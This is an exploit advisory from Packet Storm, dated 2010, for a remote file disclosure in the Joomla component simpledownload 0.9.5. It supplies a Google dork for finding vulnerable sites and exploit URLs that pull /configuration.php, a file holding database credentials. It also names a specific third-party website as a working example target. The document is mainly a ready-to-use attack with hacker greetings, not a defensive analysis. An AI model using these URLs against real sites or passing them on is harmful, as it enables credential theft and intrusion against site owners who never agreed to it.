Joomla Simpledownload File Disclosure

2010-05-18T00:00:00
ID PACKETSTORM:89619
Type packetstorm
Reporter altbta
Modified 2010-05-18T00:00:00

Description

                                        
                                            `  
  
[!]==========================================[!]  
  
[~] Joomla Component simpledownload Remote File Disclouse  
[~] Author : altbta (l_9@hotmail.com)  
[~] Homepage : [ v4-team.com ] & [ xp10.me ]  
[~] Date : 16 Mei, 2010  
  
[!]==========================================[!]  
  
[ Software Information ]  
  
[+] Vendor : http://joomla.joelrowley.com/  
[+] Price : free  
[+] Vulnerability : Remote File Disclouse  
[+] Dork : inurl:"com_simpledownload" ;)  
[+] Version : 0.9.5 maybe lower also affected  
  
[!]==========================================[!]  
  
===[ Exploit ]===  
  
http://site/index.php?option=com_simpledownload&task=download&fileid=[file]  
http://site/index.php?option=com_simpledownload&task=download&fileid=/configuration.php  
  
===[ Example ]===  
  
http://www.triplesix-rockhouse.com/index.php?option=com_simpledownload&task=download&fileid=/configuration.php  
  
[!]=========~~{ altbta }~~=========[!]  
  
RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3  
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito  
SnIpEr.SiTeS & ابو الجازي & اورنج مان  
  
  
  
`